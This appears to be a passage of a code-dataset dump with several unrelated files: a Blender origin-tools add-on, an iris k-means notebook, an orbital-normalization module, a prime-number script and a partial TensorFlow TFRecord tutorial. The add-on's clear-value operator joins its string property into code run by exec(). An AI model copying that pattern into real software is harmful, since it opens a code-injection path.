'Fixed Spot Pick Location'\n\tbl_description = 'Pick location of projection spot'\n\n\tprm_spt_mode: bpr.EnumProperty(name= 'Fixed Spot Mode', items= [('1','Active','',1),('2','Multi','',2)])\n\tprm_spt_axis: bpr.EnumProperty(name= 'Projection Along', items= [('1','X Axis','',1),('2','Y Axis','',2),('3','Z Axis','',3)])\n\tprm_spt_dir: bpr.EnumProperty(name= 'Projection Direction', items= [('1','Positive','',1),('2','Negative','',2)])\n\tprm_spt_space: bpr.EnumProperty(name = 'Projection Space', items= [('1','Global','',1),('2','Local','',2),('3','View','',3),('4','Cursor','',4),('5','Preset','',5)])\n
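\t# Spot codes: the first letter is the position along projection axis A and the\n\t# second along axis B (n = negative, c = centre, p = positive bound side).\n\tprm_spt_spot: bpr.EnumProperty(name='Choose Spot',\n\t\titems= [\n\t\t('np','Projection A Neg - B 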
Pos','',1),\n\t\t('cp','Projection A Cen - B Pos','',2),\n\t\t('pp','Projection A Pos - B Pos','',3),\n\t\t('nc','Projection A Neg - B Cen','',4),\n\t\t('cc','Projection A Cen - B Cen','',5),\n\t\t('pc','Projection A Pos - B Cen','',6),\n\t\t('nn','Projection A Neg - B Neg','',7),\n\t\t('cn','Projection A Cen - B Neg','',8),\n\t\t('pn','Projection A Pos - B Neg','',9),\n\t\t('bom','Border Mesh Spot','',10),\n\t\t('boc','Bound Center Spot','',11),\n\t\t('com','Center Of Mass Spot','',12),\n\t\t('dtp_b','Drop To Spot','',13)])\n\tprm_drp_m: bpr.EnumProperty(name= 'Drop To Mode', items= [('1','Space','',1),('2','Bound','',2)])\n\tprm_drp_sm: bpr.EnumProperty(name= 'Drop To Submode', items= [('1','Zero','',1),('2','Median','',2)])\n\tprm_drp_off: bpr.FloatProperty(name= 'Drop To Offset', subtype = 'DISTANCE', precision= 6)\n\tprm_drp_czpb: bpr.BoolProperty(name= 'Use Custom Zero', default= False, description= 'Only for Drop To Mode = Space + Drop To Submode = Zero')\n\tprm_drp_czpv: bpr.FloatVectorProperty( name= 'Custom Zero', subtype= 'XYZ_LENGTH', unit= 'LENGTH', precision= 6)\n\n\tdef execute(self,context):\n\t\tbco = bpy.context\n\t\tsot = context.scene.sot_props\n\t\taob = bco.active_object\n\t\tsob = bco.selected_objects\n\n\t\tif 'MESH' not in [ob.type for ob in sob]: return report(self,'No MESH objects in selection!!!')\n\t\tif self.prm_spt_mode == '1':\t\n\t\t\tif aob_check(aob)[0]: return report(self, aob_check(aob)[1])\n\t\t\telif aob.type != 'MESH': return report(self,'ACTIVE object is not MESH type!!!')\n\n\t\tglobal spot_sob_matrices_vdata\n\t\tglobal spot_orient_matrix\n\t\tglobal spot_psp_data\n\n\t\tif pr_values == {} and sot.spot_set_space == '5': \n\t\t\tsot.spot_set_space = '1'\n\n\t\tprint('\\nPICK SPOT ------------------------------')\n\n\t\tmatrices_vdata_get(self.prm_spt_mode,aob,sob)\n\t\trotation_matrix_get(self.prm_spt_space,bco,sot,aob,sob)\n\t\tspots_calc(self.prm_spt_mode,self.prm_spt_space)\n\t\tprojection_calc(self.prm_spt_axis,self.prm_spt_dir,self.prm_drp_m,self.prm_drp_sm, \\\n\t\t\t\t\t\tself.prm_drp_off,self.prm_drp_czpb,self.prm_drp_czpv)\n\n\t\tsot.loc_x,sot.loc_y,sot.loc_z = spot_psp_data[0].get(self.prm_spt_spot)\n\n\t\treturn{'FINISHED'}\n\nclass SOT_OT_Convert_Local(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_convert_local'\n\tbl_label = 'SOT_OT_Convert_Local'\n\n\tdef execute(self,context):\n\t\tsot = context.scene.sot_props\n\n\t\trot_mat = mu.Euler((sot.rot_x,sot.rot_y,sot.rot_z), 'XYZ').to_matrix()\n\t\tltr = rot_mat.inverted() @ mu.Vector((sot.loc_x,sot.loc_y,sot.loc_z))\n\n\t\tsot.loc_x_ltr = ltr[0]\n\t\tsot.loc_y_ltr = ltr[1]\n\t\tsot.loc_z_ltr = ltr[2]\n\n\t\treturn {'FINISHED'}\n\n\nclass SOT_OT_Convert_From_Local(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_convert_from_local'\n\tbl_label = 'SOT_OT_Convert_From_Local'\n\n\tdef execute(self,context):\n\t\tsot = context.scene.sot_props\n\t\tglobal rot_update\n\n\t\tif rot_update != 0:\n\t\t\trot_update -= 1\n\n\t\telse:\n\t\t\trot_mat = mu.Euler((sot.rot_x,sot.rot_y,sot.rot_z), 'XYZ').to_matrix()\n\t\t\tgtr = rot_mat @ mu.Vector((sot.loc_x_ltr,sot.loc_y_ltr,sot.loc_z_ltr))\n\n\t\t\tsot.loc_x = gtr[0]\n\t\t\tsot.loc_y = gtr[1]\n\t\t\tsot.loc_z = gtr[2]\n\n\t\treturn {'FINISHED'}\n\n\nclass SOT_OT_Clear_Value(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_clear_value'\n\tbl_label = 'SOT_OT_Clear_Value'\n\n\tcop: bpr.StringProperty(name = '', default = '')\n
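\t# cln_dic maps each property name to the reset expression appended to\n\t# 'sot.<name>' and run via exec() below; a cop of 'multi a b c' resets\n\t# several properties in one call.\n\tcln_dic = {'loc_x':'= 0','loc_y':'= 0','loc_z':'= 0',\n\t\t\t\t'loc_x_ltr':'= 0','loc_y_ltr':'= 0','loc_z_ltr':'= 0',\n\t\t\t\t'rot_x':'= 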
0','rot_y':'= 0','rot_z':'= 0',\n\t\t\t\t'z_axis':\"= 'z+'\",'rem_zp':\"= '1'\",'rem_zn':\"= '1'\",\n\t\t\t\t'rem_yp':\"= '1'\",'rem_yn':\"= '1'\",'rem_xp':\"= '1'\",'rem_xn':\"= '1'\",\n\t\t\t\t'drop_to_offset':'= 0', 'czp_x':'= 0', 'czp_y':'= 0', 'czp_z':'= 0',\n\t\t\t\t'draw_spots_scale':'= 1'}\n\n\tdef execute(self,context):\n\t\tsot = context.scene.sot_props\n\t\tif 'multi' in self.cop:\n\t\t\tfor prm in self.cop.split()[1:]:\n\t\t\t\texec('sot.'+ prm + self.cln_dic.get(prm))\n\t\t\tbpy.ops.ed.undo_push(message = 'SOT Clear Value' )\n\t\telse:\n\t\t\texec('sot.'+ self.cop + self.cln_dic.get(self.cop))\n\t\t\tbpy.ops.ed.undo_push(message = 'SOT Clear Value' )\n\t\treturn {'FINISHED'}\n\n\nclass SOT_OT_Draw_Axis(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_draw_loc_rot_axis'\n\tbl_label = 'SOT_OT_Draw_Axis'\n\n\tdef stop(self):\n\t\tbpy.types.SpaceView3D.draw_handler_remove(self.draw_handler, 'WINDOW')\n\t\treturn {'CANCELLED'}\n\n\tdef modal(self,context,event):\n\n\t\tsot = context.scene.sot_props\n\t\n\t\tif not sot.draw_loc_rot_axis:\n\t\t\treturn self.stop()\n\n\t\ttry:\n\t\t\tcontext.area.tag_redraw()\n\t\texcept:\n\t\t\tsot.draw_loc_rot_axis = False\n\t\t\treturn self.stop()\n\n\t\telse:\n\t\t\tcontext.area.tag_redraw()\n\t\t\treturn {'PASS_THROUGH'}\n\n\tdef invoke(self,context,event):\n\t\tfor area in bpy.context.window.screen.areas:\n\t\t\tif area.type == 'VIEW_3D':\n\t\t\t\targs = (self,context)\n\t\t\t\tself.draw_handler = bpy.types.SpaceView3D.draw_handler_add(draw_loc_rot_axis_main, args, 'WINDOW', 'POST_VIEW')\n\t\t\t\tcontext.window_manager.modal_handler_add(self)\n\t\t\t\treturn {'RUNNING_MODAL'}\n\n\nclass SOT_OT_Draw_Presets(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_draw_loc_rot_presets'\n\tbl_label = 'SOT_OT_Draw_Presets'\n\n\tdef modal(self,context,event):\n\n\t\tsot = context.scene.sot_props\n\n\t\tif not sot.draw_loc_rot_presets:\n\t\t\tbpy.types.SpaceView3D.draw_handler_remove(self.draw_handler, 'WINDOW')\n\t\t\treturn {'CANCELLED'}\n\n\t\ttry:\n\t\t\tcontext.area.tag_redraw()\n\t\texcept:\n\t\t\tbpy.types.SpaceView3D.draw_handler_remove(self.draw_handler, 'WINDOW')\n\t\t\tsot.draw_loc_rot_presets = False\n\t\t\treturn {'CANCELLED'}\n\t\telse:\n\t\t\tcontext.area.tag_redraw()\n\t\t\treturn {'PASS_THROUGH'}\n\n\tdef invoke(self,context,event):\n\t\tfor area in bpy.context.window.screen.areas:\n\t\t\tif area.type == 'VIEW_3D':\n\t\t\t\targs = (self,context)\n\t\t\t\tself.draw_handler = bpy.types.SpaceView3D.draw_handler_add(draw_loc_rot_presets_main, args, 'WINDOW', 'POST_VIEW')\n\t\t\t\tcontext.window_manager.modal_handler_add(self)\n\t\t\t\treturn {'RUNNING_MODAL'}\n\n\n
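# SOT_OT_Draw_Spots follows the same modal pattern as the two draw operators\n# above: install a POST_VIEW draw handler, redraw every modal tick, and remove\n# the handler once its scene toggle is cleared or the area becomes invalid.\nclass SOT_OT_Draw_Spots(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_draw_spots'\n\tbl_label = 'SOT_OT_Draw_Spots'\n\n\tdef modal(self,context,event):\n\t\tsot = context.scene.sot_props\n\t\n\t\tif not sot.draw_spots:\n\t\t\tbpy.types.SpaceView3D.draw_handler_remove(self.draw_handler, 'WINDOW')\n\t\t\tsot.draw_spots_recalc = False\n\t\t\treturn {'CANCELLED'}\n\n\t\ttry:\n\t\t\tcontext.area.tag_redraw()\n\t\texcept:\n\t\t\tbpy.types.SpaceView3D.draw_handler_remove(self.draw_handler, 'WINDOW')\n\t\t\tsot.draw_spots_recalc = False\n\t\t\tsot.draw_spots = False\n\t\t\treturn {'CANCELLED'}\n\t\telse:\n\t\t\tcontext.area.tag_redraw()\n\t\t\treturn {'PASS_THROUGH'}\n\n\tdef invoke(self,context,event):\n\t\tfor area in bpy.context.window.screen.areas:\n\t\t\tif area.type == 'VIEW_3D':\n\t\t\t\targs = (self,context)\n\t\t\t\tself.draw_handler = bpy.types.SpaceView3D.draw_handler_add(draw_spots_main, args, 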
'WINDOW', 'POST_VIEW')\n\t\t\t\tcontext.window_manager.modal_handler_add(self)\n\t\t\t\treturn {'RUNNING_MODAL'}\n\n\n\n\n# PROPERTIES -----------------------------------------------------\n\n\n\n\n\nclass SOT_PR_Settings_Props(bpy.types.PropertyGroup):\n\n\tloc_rot_from_preset: bpr.BoolProperty(name = '', default = False)\n\tloc_rot_active_batch: bpr.EnumProperty(\n\t\titems= [('1','Active','Set ORIGIN for ACTIVE object only',1),\n\t\t\t\t('2','Batch','Set ORIGIN for EACH object in selection',2)], default= '1')\n\tdraw_loc_rot_axis: bpr.BoolProperty(name = '', default = False, update= prop_update_draw_loc_rot_axis)\n\n\tloc_rot_presets: bpr.EnumProperty(\n\t\titems = enum_updateloc_rot_presets, name = 'Loc/Orient Presets', description = 'Preset')\n\tdraw_loc_rot_presets: bpr.BoolProperty(default= False, update= prop_update_draw_loc_rot_presets)\n\n\tloc_mode: bpr.EnumProperty(items= [('1','Global','',1),('2','Local','',2)], update= prop_update_loc_mode)\n\n\tloc_x: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\tloc_y: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\tloc_z: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\n\tloc_x_ltr: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6, update= prop_update_loc_ltr)\n\tloc_y_ltr: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6, update= prop_update_loc_ltr)\n\tloc_z_ltr: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6, update= prop_update_loc_ltr)\n\n\trot_x: bpr.FloatProperty(subtype = 'ANGLE', min= -6.28319, max= 6.28319, update= prop_update_rot)\n\trot_y: bpr.FloatProperty(subtype = 'ANGLE', min= -6.28319, max= 6.28319, update= prop_update_rot)\n\trot_z: bpr.FloatProperty(subtype = 'ANGLE', min= -6.28319, max= 6.28319, update= prop_update_rot)\n\n\tz_rem: bpr.BoolProperty(name = 'Z+ Remap', description= 'Remap Z+ axis orientation (may be quite handy for certain cases)', default = False)\n\n\tz_axis: bpr.EnumProperty(name='',\n\t\titems= [('z+','Z+ Same','Z+ axis untouched as it is.',1),\n\t\t\t\t('z-','Z- Axis','Z+ use Z- vector',2),\n\t\t\t\t('y+','Y+ Axis','Z+ use Y+ vector',3),\n\t\t\t\t('y-','Y- Axis','Z+ use Y- vector',4),\n\t\t\t\t('x+','X+ Axis','Z+ use X+ vector',5),\n\t\t\t\t('x-','X- Axis','Z+ use X- vector',6)], default= 'z+')\n\trem_zp: bpr.EnumProperty(\n\t\titems= [('1','X+ same | Y+ same ','',1),('2','X+ to Y+ | Y+ to X-','',2),\n\t\t\t\t('3','X+ to X- | Y+ to Y-','',3),('4','X+ to Y- | Y+ to X+','',4)], default= '1')\n\trem_zn: bpr.EnumProperty(\n\t\titems= [('1','X+ same | Y+ to Y-','',1),('2','X+ to Y+ | Y+ to X+','',2),\n\t\t\t\t('3','X+ to X- | Y+ same ','',3),('4','X+ to Y- | Y+ to X-','',4)], default= '1')\n\trem_yp: bpr.EnumProperty(\n\t\titems= [('1','X+ same | Y+ to Z-','',1),('2','X+ to Z+ | Y+ to X+','',2),\n\t\t\t\t('3','X+ to X- | Y+ to Z+','',3),('4','X+ to Z- | Y+ to X-','',4)], default= '1')\n\trem_yn: bpr.EnumProperty(\n\t\titems= [('1','X+ same | Y+ to Z+','',1),('2','X+ to Z+ | Y+ to X-','',2),\n\t\t\t\t('3','X+ to X- | Y+ to Z-','',3),('4','X+ to Z- | Y+ to X+','',4)], default= '1')\n\trem_xp: bpr.EnumProperty(\n\t\titems= [('1','X+ to Z- | Y+ same ','',1),('2','X+ to Y+ | Y+ to Z+','',2),\n\t\t\t\t('3','X+ to Z+ | Y+ to Y-','',3),('4','X+ to Y- | Y+ to Z-','',4)], default= '1')\n\trem_xn: bpr.EnumProperty(\n\t\titems= [('1','X+ to Z+ | Y+ same ','',1),('2','X+ to Y+ | Y+ to Z-','',2),\n\t\t\t\t('3','X+ to Z- | Y+ to Y-','',3),('4','X+ to Y- | Y+ to Z+','',4)], default= '1')\n\n\n
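\t# Each rem_* enum above offers the four X+/Y+ re-assignments valid for its Z+\n\t# remap target - effectively the four quarter-turns about the remapped Z axis.\n\tspot_set_pick: bpr.EnumProperty(\n\t\titems= [('1','Set Origin','Set ORIGIN location 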
to FIXED spot',1),\n\t\t\t\t('2','Pick Spot','Pick spots LOCATION values to Location & Orientation panel',2)], default= '1', update= prop_update_spot_set_pick)\n\tspot_set_mode: bpr.EnumProperty(\n\t\titems= [('1','Active','Set ORIGIN for ACTIVE object only',1),\n\t\t\t\t('2','Multi','Set ORIGINS for MULTIPLE objects as if they are single object',2),\n\t\t\t\t('3','To Active','Set ORIGINS of MULTIPLE objects to ACTIVE object spots',3),\n\t\t\t\t('4','For Each','Set ORIGINS for EACH object own spots in selection',4)], default= '1')\n\tspot_set_not_active: bpr.BoolProperty(name = '', description= 'ORIGIN transformation will not affect ACTIVE object', default = False)\n\n\tspot_set_axis: bpr.EnumProperty(items= [('1','X','',1),('2','Y','',2),('3','Z','',3)], description= 'Spots projection AXIS', default= '1')\n\tspot_set_dir: bpr.EnumProperty(items= [('1','Positive','',1),('2','Negative','',2)], description= 'Spots projection ORIENTATION', default= '1')\n\tspot_set_space: bpr.EnumProperty(items= [('1','Global','',1),('2','Local','',2),('3','View','',3),('4','Cursor','',4),('5','Preset','',5)],\n\t\t\t\t\t\t\t\t\tdescription= 'Spots projection SPACE')\n\n\tdrop_to_mode: bpr.EnumProperty(\n\t\titems= [('1','Space','Drop ORIGIN to current SPACE',1),\n\t\t\t\t('2','Bound','Drop ORIGIN to current BOUND in current space',2)], default= '1')\n\tdrop_to_smode: bpr.EnumProperty(\n\t\titems= [('1','Zero','Drop ORIGIN to selected SPACE zero',1),\n\t\t\t\t('2','Median','Drop ORIGIN to MEDIAN between selected objects (designed for multiple objects)',2)], default= '1')\n\tdrop_to_offset: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\tdrop_custom_zero: bpr.BoolProperty(name= '', default=False)\n\n\tczp_x: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\tczp_y: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\tczp_z: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\n\tdraw_spots: bpr.BoolProperty(name = '', default = False, update= prop_update_draw_spots)\n\tdraw_spots_recalc: bpr.BoolProperty(name = '', default = True, update= prop_update_draw_spots_recalc,\n\t\t\t\t\t\t\t\t\t\tdescription = 'Recalculate current mesh bound spots manually')\n\tdraw_spots_scale: bpr.FloatProperty(default= 1,precision= 2,min= 0.1, max= 2)\n\tdraw_opt_bndc: bpr.BoolProperty(name = '', default =True)\n\tdraw_opt_bnds: bpr.BoolProperty(name = '', default =True)\n\tdraw_opt_dtpl: bpr.BoolProperty(name = '', default =True)\n\n\nctr = [\n\tSOT_PT_Panel,\n\tSOT_PT_Location_Orientation,\n\tSOT_PT_Location,\n\tSOT_PT_Orientation,\n\tSOT_PT_Presets,\n\tSOT_PT_Fixed_Snap,\n\n\tSOT_OT_Preset_Ren,\n\tSOT_OT_Preset_Add,\n\tSOT_OT_Preset_Add_Cursor,\n\tSOT_OT_Preset_Add_Active,\n\tSOT_OT_Preset_Rem,\n\tSOT_OT_Preset_Rrd,\n\tSOT_OT_Preset_Get,\n\tSOT_OT_Set_Loc_Rot,\n\tSOT_OT_Get_Transform,\n\tSOT_OT_Rotate_Ninety,\n\tSOT_OT_Fixed_Snap,\n\tSOT_OT_Fixed_Spot_Pick,\n\tSOT_OT_Convert_Local,\n\tSOT_OT_Convert_From_Local,\n\tSOT_OT_Clear_Value,\n\n\tSOT_OT_Draw_Axis,\n\tSOT_OT_Draw_Presets,\n\tSOT_OT_Draw_Spots,\n\n\tSOT_PR_Settings_Props]\n\ndef register():\n\tfor cls in ctr:\n\t\tbpy.utils.register_class(cls)\n\tbpy.types.Scene.sot_props = bpy.props.PointerProperty(type=SOT_PR_Settings_Props)\n\ndef unregister():\n\tfor cls in reversed(ctr):\n\t\tbpy.utils.unregister_class(cls)\n\tdel 
bpy.types.Scene.sot_props\n","repo_name":"IIIFGIII/FG_Tools","sub_path":"SOT/FG_Tools_SOT_V283+.py","file_name":"FG_Tools_SOT_V283+.py","file_ext":"py","file_size_in_byte":83913,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"8308240131","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.style as style\n\n\n# In[2]:\n\n\ndata = pd.read_csv(\"iris.csv\",index_col=0)\ndata.shape\n\n\n# In[3]:\n\n\ndata.head()\n\n\n# In[4]:\n\n\nfrom sklearn.cluster import KMeans\nX=data.iloc[:,:4].values\navg_distance=[]\nfor i in range(1,11):\n clusterer=KMeans(n_clusters=i,random_state=2).fit(X)\n avg_distance.append(clusterer.inertia_) \n\n\n# In[5]:\n\n\nplt.plot(range(1,11), avg_distance)\nplt.xlabel(\"Number of Clusters (k)\")\nplt.ylabel(\"Distance\")\nplt.show()\n\n\n# In[6]:\n\n\nkmeans=KMeans(n_clusters=2,random_state=2)\ny_means=kmeans.fit_predict(X)\n\n\n# In[7]:\n\n\nplt.figure(figsize=[10,8])\nplt.scatter(X[y_means == 0,0], X[y_means == 0,1], \n s = 100, c = \"red\", label = 'cluster 1')\nplt.scatter(X[y_means == 1, 0], X[y_means == 1, 1], \n s = 100, c = 'blue', label = 'cluster 2')\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:,1], \n s = 100, c = 'black', label = 'Centroids')\n\nplt.legend()\nplt.show()\n\n","repo_name":"Shakti299/Prediction-using-Unsupervised-ML","sub_path":"Prediction using Unsupervised ML.py","file_name":"Prediction using Unsupervised ML.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38044576135","text":"\nimport numpy as np\n\nfrom time import time\nfrom toeplitz import tmat\n\n\n\ndef norms(ao_overlaps, coeffs):\n '''\n Given AO overlaps and MO or PAO coefficients, compute the \n norms of the PAOs or MOs.\n \n ao_overlaps : AO overlaps, given as a 'tmat' object.\n pao_coeffs : PAO coefficients, given as a 'tmat' \n object. The elements are stored as \n C_{\\mu, p}, where a row corresponds to\n an AO and a column to an MO or a PAO.\n '''\n coords0 = np.zeros((1, 3), dtype=int) \n \n time1 = time()\n c_tT = coeffs.tT()\n s_tT = ao_overlaps.tT()\n \n # C_tT * S_tT\n cs = c_tT.cdot(s_tT, coords = coeffs.coords)\n time2 = time()\n print('Time for S*C:', time2 - time1)\n \n # (C_tT * S_tT) * C \n time3 = time()\n orb_overlaps = cs.cdot(coeffs, coords = coords0)\n time4 = time()\n print('Time for C * SC:', time4 - time3)\n \n # Return orbital norms, in the same order as the MO or\n # PAO orbitals given in 'coeffs'.\n return np.diagonal(orb_overlaps.get(coords0[0]))\n\n\ndef normalize(coeffs, norms):\n '''\n Given PAO or MO coefficients in the form C_{\\mu, p}^{L},\n where \\mu is an AO and p is an MO or PAO, and \n corresponding norms, return normalized coefficients. 
\n \n coeffs : MO or PAO coefficients, given as a \n 'tmat' object.\n norms : Norms , given as a 1D Numpy array\n in the same order as the orbitals p\n in 'coeffs'.\n '''\n blocks = []\n # Loop over cell blocks and normalize\n for c in coeffs.coords:\n block = coeffs.get(c) / np.sqrt(norms)\n blocks.append(block)\n \n return tmat(coords = coeffs.coords,\n blocks = np.array(blocks, dtype=float))\n\n\ndef normalize_orbitals(ao_overlaps, coeffs):\n '''\n Normalize the coefficients 'coeffs'.\n \n ao_overlaps : AO overlaps, given as a 'tmat' object.\n coeffs : Coefficients, given as a 'tmat' object.\n '''\n nrms = norms(ao_overlaps, coeffs)\n \n return normalize(coeffs, nrms)\n","repo_name":"audunsh/XDEC","sub_path":"utils/orb_functions.py","file_name":"orb_functions.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26343641204","text":"print(\"Program Menampilkan Bilangan Prima dari 1-100\")\na=2\nwhile(a <= 100):\n b=2\n while(b <= (a/b)):\n if not(a%b):\n break\n b+=1\n if (b > a/b):\n print(a)\n a+=1\nprint(\"Selesai\")","repo_name":"MIRX562/Practice","sub_path":"Latihan 2/Program bilangan prima.py","file_name":"Program bilangan prima.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17912357892","text":"import tensorflow as tf\n\nimport numpy as np\nimport IPython.display as display\n\n\"\"\"## `tf.Example`\n\n### Data types for `tf.Example`\n\nFundamentally a `tf.Example` is a `{\"string\": tf.train.Feature}` mapping.\n\nThe `tf.train.Feature` message type can accept one of the following three types (See the [`.proto` file]((https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/example/feature.proto) for reference). Most other generic types can be coerced into one of these.\n\n1. `tf.train.BytesList` (the following types can be coerced)\n\n- `string`\n- `byte`\n\n1. `tf.train.FloatList` (the following types can be coerced)\n\n- `float` (`float32`)\n- `double` (`float64`)\n\n1. `tf.train.Int64List` (the following types can be coerced)\n\n- `bool`\n- `enum`\n- `int32`\n- `uint32`\n- `int64`\n- `uint64`\n\nIn order to convert a standard TensorFlow type to a `tf.Example`-compatible `tf.train.Feature`, you can use the following shortcut functions:\n\nEach function takes a scalar input value and returns a `tf.train.Feature` containing one of the three `list` types above.\n\"\"\"\n\n# The following functions can be used to convert a value to a type compatible\n# with tf.Example.\n\n\ndef _bytes_feature(value):\n \"\"\"Returns a bytes_list from a string / byte.\"\"\"\n if isinstance(value, type(tf.constant(0))):\n value = value.numpy() # BytesList won't unpack a string from an EagerTensor.\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef _float_feature(value):\n \"\"\"Returns a float_list from a float / double.\"\"\"\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\n\ndef _int64_feature(value):\n \"\"\"Returns an int64_list from a bool / enum / int / uint.\"\"\"\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\n\"\"\"Note: To stay simple, this example only uses scalar inputs. The simplest way to handle non-scalar features is to use `tf.serialize_tensor` to convert tensors to binary-strings. Strings are scalars in tensorflow. 
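(A minimal sketch, assumed rather than taken from the original text: `serialized = tf.io.serialize_tensor(tf.ones([2, 2]))` yields a scalar `tf.string` tensor whose bytes can be stored via `_bytes_feature(serialized.numpy())`.)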
Use `tf.parse_tensor` to convert the binary-string back to a tensor.\n\nBelow are some examples of how these functions work. Note the varying input types and the standardizes output types. If the input type for a function does not match one of the coercible types stated above, the function will raise an exception (e.g. `_int64_feature(1.0)` will error out, since `1.0` is a float, so should be used with the `_float_feature` function instead).\n\"\"\"\n\nprint(_bytes_feature(b'test_string'))\nprint(_bytes_feature(u'test_bytes'.encode('utf-8')))\n\nprint(_float_feature(np.exp(1)))\n\nprint(_int64_feature(True))\nprint(_int64_feature(1))\n\n\"\"\"All proto messages can be serialized to a binary-string using the `.SerializeToString` method.\"\"\"\n\nfeature = _float_feature(np.exp(1))\n\nfeature.SerializeToString()\n\n\"\"\"### Creating a `tf.Example` message\n\nSuppose you want to create a `tf.Example` message from existing data. In practice, the dataset may come from anywhere, but the procedure of creating the `tf.Example` message from a single observation will be the same.\n\n1. Within each observation, each value needs to be converted to a `tf.train.Feature` containing one of the 3 compatible types, using one of the functions above.\n\n1. We create a map (dictionary) from the feature name string to the encoded feature value produced in #1.\n\n1. The map produced in #2 is converted to a [`Features` message](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/example/feature.proto#L85).\n\nIn this notebook, we will create a dataset using NumPy.\n\nThis dataset will have 4 features.\n- a boolean feature, `False` or `True` with equal probability\n- an integer feature uniformly randomly chosen from `[0, 5)`\n- a string feature generated from a string table by using the integer feature as an index\n- a float feature from a standard normal distribution\n\nConsider a sample consisting of 10,000 independently and identically distributed observations from each of the above distributions.\n\"\"\"\n\n# the number of observations in the dataset\nn_observations = int(1e4)\n\n# boolean feature, encoded as False or True\nfeature0 = np.random.choice([False, True], n_observations)\n\n# integer feature, random from 0 .. 4\nfeature1 = np.random.randint(0, 5, n_observations)\n\n# string feature\nstrings = np.array([b'cat', b'dog', b'chicken', b'horse', b'goat'])\nfeature2 = strings[feature1]\n\n# float feature, from a standard normal distribution\nfeature3 = np.random.randn(n_observations)\n\n\"\"\"Each of these features can be coerced into a `tf.Example`-compatible type using one of `_bytes_feature`, `_float_feature`, `_int64_feature`. We can then create a `tf.Example` message from these encoded features.\"\"\"\n\n\ndef serialize_example(feature0, feature1, feature2, feature3):\n \"\"\"\n Creates a tf.Example message ready to be written to a file.\n \"\"\"\n # Create a dictionary mapping the feature name to the tf.Example-compatible\n # data type.\n feature = {\n 'feature0': _int64_feature(feature0),\n 'feature1': _int64_feature(feature1),\n 'feature2': _bytes_feature(feature2),\n 'feature3': _float_feature(feature3),\n }\n\n # Create a Features message using tf.train.Example.\n\n example_proto = tf.train.Example(features=tf.train.Features(feature=feature))\n return example_proto.SerializeToString()\n\n\n\"\"\"For example, suppose we have a single observation from the dataset, `[False, 4, bytes('goat'), 0.9876]`. 
We can create and print the `tf.Example` message for this observation using `create_message()`. Each single observation will be written as a `Features` message as per the above. Note that the `tf.Example` [message](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/example/example.proto#L88) is just a wrapper around the `Features` message.\"\"\"\n\n# This is an example observation from the dataset.\n\nexample_observation = []\n\nserialized_example = serialize_example(False, 4, b'goat', 0.9876)\n\n\"\"\"To decode the message use the `tf.train.Example.FromString` method.\"\"\"\n\nexample_proto = tf.train.Example.FromString(serialized_example)\n\n\"\"\"## TFRecords Format Details\n\nA TFRecord file contains a sequence of records. The file can only be read sequentially.\n\nEach record contains a byte-string, for the data-payload, plus the data-length, and CRC32C (32-bit CRC using the Castagnoli polynomial) hashes for integrity checking.\n\nEach record has the format\n\n uint64 length\n uint32 masked_crc32_of_length\n byte data[length]\n uint32 masked_crc32_of_data\n\nThe records are concatenated together to produce the file. CRCs are\n[described here](https://en.wikipedia.org/wiki/Cyclic_redundancy_check), and\nthe mask of a CRC is\n\n masked_crc = ((crc >> 15) | (crc << 17)) + 0xa282ead8ul\n\nNote: There is no requirement to use `tf.Example` in TFRecord files. `tf.Example` is just a method of serializing dictionaries to byte-strings. Lines of text, encoded image data, or serialized tensors (using `tf.io.serialize_tensor`, and\n`tf.io.parse_tensor` when loading). See the `tf.io` module for more options.\n\n## TFRecord files using `tf.data`\n\nThe `tf.data` module also provides tools for reading and writing data in tensorflow.\n\n### Writing a TFRecord file\n\nThe easiest way to get the data into a dataset is to use the `from_tensor_slices` method.\n\nApplied to an array, it returns a dataset of scalars.\n\"\"\"\n\ntf.data.Dataset.from_tensor_slices(feature1)\n\n\"\"\"Applies to a tuple of arrays, it returns a dataset of tuples:\"\"\"\n\nfeatures_dataset = tf.data.Dataset.from_tensor_slices((feature0, feature1, feature2, feature3))\n\n# Use `take(1)` to only pull one example from the dataset.\nfor f0, f1, f2, f3 in features_dataset.take(1):\n print(f0)\n print(f1)\n print(f2)\n print(f3)\n\n\"\"\"Use the `tf.data.Dataset.map` method to apply a function to each element of a `Dataset`.\n\nThe mapped function must operate in TensorFlow graph mode: It must operate on and return `tf.Tensors`. 
